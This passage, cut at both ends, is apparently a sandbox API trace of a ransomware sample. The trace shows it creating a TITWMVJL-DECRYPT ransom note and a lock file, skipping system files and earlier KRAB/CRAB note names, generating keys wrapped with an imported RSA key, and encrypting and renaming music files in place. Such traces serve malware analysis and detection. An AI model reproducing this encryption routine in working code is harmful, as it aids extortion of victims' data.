param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\\\TITWMVJL-DECRYPT.txt") returned 49 [0092.382] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0092.383] GetLastError () returned 0x50 [0092.383] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.383] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.383] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x25, wMilliseconds=0x2b5)) [0092.383] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.383] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0092.384] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0092.384] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\d2ca4a09d2ca4deb61a.lock") returned 52 [0092.384] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0092.384] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.384] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.385] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\") returned 28 [0092.385] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\*" [0092.385] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503638 [0092.385] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.385] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.386] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.386] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.386] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.386] lstrcmpW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2=".") returned 1 [0092.386] lstrcmpW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="..") returned 1 [0092.386] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="0VWyNHahluafpdFSUYC.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\0VWyNHahluafpdFSUYC.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\0VWyNHahluafpdFSUYC.m4a" [0092.386] lstrlenW (lpString=".titwmvjl") returned 9 [0092.386] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\0VWyNHahluafpdFSUYC.m4a") returned 51 [0092.386] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.386] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\0VWyNHahluafpdFSUYC.m4a.titwmvjl") returned 60 [0092.386] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\0VWyNHahluafpdFSUYC.m4a") returned 51 [0092.386] lstrlenW (lpString=".m4a") returned 4 [0092.386] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.387] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".m4a ") returned 5 [0092.387] lstrcmpiW (lpString1=".m4a", lpString2=".titwmvjl") returned -1 [0092.387] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.387] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\0VWyNHahluafpdFSUYC.m4a") returned 51 [0092.387] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\0VWyNHahluafpdFSUYC.m4a") returned 51 [0092.387] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="desktop.ini") returned -1 [0092.387] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="autorun.inf") returned -1 [0092.387] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="ntuser.dat") returned -1 [0092.387] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="iconcache.db") returned -1 [0092.387] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="bootsect.bak") returned -1 [0092.387] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="boot.ini") returned -1 [0092.387] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="ntuser.dat.log") returned -1 [0092.388] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="thumbs.db") returned -1 [0092.388] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.388] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.388] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0092.388] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="CRAB-DECRYPT.html") returned -1 [0092.388] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0092.388] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="CRAB-DECRYPT.txt") returned -1 [0092.388] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="ntldr") returned -1 [0092.388] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="NTDETECT.COM") returned -1 [0092.388] lstrcmpiW (lpString1="0VWyNHahluafpdFSUYC.m4a", lpString2="Bootfont.bin") returned -1 [0092.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\0VWyNHahluafpdFSUYC.m4a") returned 51 [0092.388] lstrlenW (lpString=".m4a") returned 4 [0092.388] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.388] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".m4a ") returned 5 [0092.388] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.388] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.389] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\0VWyNHahluafpdFSUYC.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\0vwynhahluafpdfsuyc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0092.389] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.389] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0092.390] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.391] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.391] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.391] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.391] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.391] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0092.392] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.392] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.392] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.392] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.392] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.392] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.393] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.393] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.393] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0092.393] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.393] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.393] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.393] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.393] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.394] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5035b8) returned 1 [0092.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.394] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.394] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.394] GetLastError () returned 0x0 [0092.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.395] CryptDestroyKey (hKey=0x5035b8) returned 1 [0092.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.395] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.395] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.396] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503938) returned 1 [0092.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.396] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.396] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.396] GetLastError () returned 0x0 [0092.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.396] CryptDestroyKey (hKey=0x503938) returned 1 [0092.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.397] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.397] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.397] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.397] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x1557b, lpOverlapped=0x0) returned 1 [0092.412] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffeaa85, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.412] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1557b, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x1557b, lpOverlapped=0x0) returned 1 [0092.414] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.414] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0092.415] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.419] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.419] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.419] CloseHandle (hObject=0x2ac) returned 1 [0092.420] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\0VWyNHahluafpdFSUYC.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\0vwynhahluafpdfsuyc.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\0VWyNHahluafpdFSUYC.m4a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\0vwynhahluafpdfsuyc.m4a.titwmvjl"), dwFlags=0x1) returned 1 [0092.420] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.421] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.421] lstrcmpW (lpString1="1Jvic71.m4a", lpString2=".") returned 1 [0092.421] lstrcmpW (lpString1="1Jvic71.m4a", lpString2="..") returned 1 [0092.421] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="1Jvic71.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\1Jvic71.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\1Jvic71.m4a" [0092.421] lstrlenW (lpString=".titwmvjl") returned 9 [0092.421] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\1Jvic71.m4a") returned 39 [0092.421] VirtualAlloc (lpAddress=0x0, dwSize=0x8e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.421] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\1Jvic71.m4a.titwmvjl") returned 48 [0092.423] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\1Jvic71.m4a") returned 39 [0092.423] lstrlenW (lpString=".m4a") returned 4 [0092.423] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.423] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".m4a ") returned 5 [0092.423] lstrcmpiW (lpString1=".m4a", lpString2=".titwmvjl") returned -1 [0092.423] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.423] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\1Jvic71.m4a") returned 39 [0092.423] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\1Jvic71.m4a") returned 39 [0092.423] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="desktop.ini") returned -1 [0092.423] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="autorun.inf") returned -1 [0092.423] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="ntuser.dat") returned -1 [0092.423] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="iconcache.db") returned -1 [0092.423] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="bootsect.bak") returned -1 [0092.423] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="boot.ini") returned -1 [0092.423] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="ntuser.dat.log") returned -1 [0092.423] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="thumbs.db") returned -1 [0092.423] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.423] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.424] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0092.424] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="CRAB-DECRYPT.html") returned -1 [0092.424] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0092.424] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="CRAB-DECRYPT.txt") returned -1 [0092.424] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="ntldr") returned -1 [0092.424] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="NTDETECT.COM") returned -1 [0092.424] lstrcmpiW (lpString1="1Jvic71.m4a", lpString2="Bootfont.bin") returned -1 [0092.424] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\1Jvic71.m4a") returned 39 [0092.424] lstrlenW (lpString=".m4a") returned 4 [0092.424] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.424] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".m4a ") returned 5 [0092.424] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.424] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.424] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\1Jvic71.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\1jvic71.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0092.425] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.425] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0092.425] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.425] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.426] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.426] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.426] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.426] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0092.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.426] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.426] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.427] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.427] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.427] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.427] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.427] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.427] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0092.427] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.428] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.428] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.428] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.428] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5036f8) returned 1 [0092.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.429] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.429] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.429] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.429] GetLastError () returned 0x0 [0092.429] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.429] CryptDestroyKey (hKey=0x5036f8) returned 1 [0092.429] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.429] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.429] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.429] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.430] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.430] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503338) returned 1 [0092.430] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.430] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.430] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.430] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.431] GetLastError () returned 0x0 [0092.431] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.431] CryptDestroyKey (hKey=0x503338) returned 1 [0092.431] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.431] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.431] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.431] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.431] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x63a1, lpOverlapped=0x0) returned 1 [0092.443] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff9c5f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.443] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x63a1, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x63a1, lpOverlapped=0x0) returned 1 [0092.444] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.444] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0092.445] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.450] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.451] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.451] CloseHandle (hObject=0x2ac) returned 1 [0092.452] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\1Jvic71.m4a" (normalized: 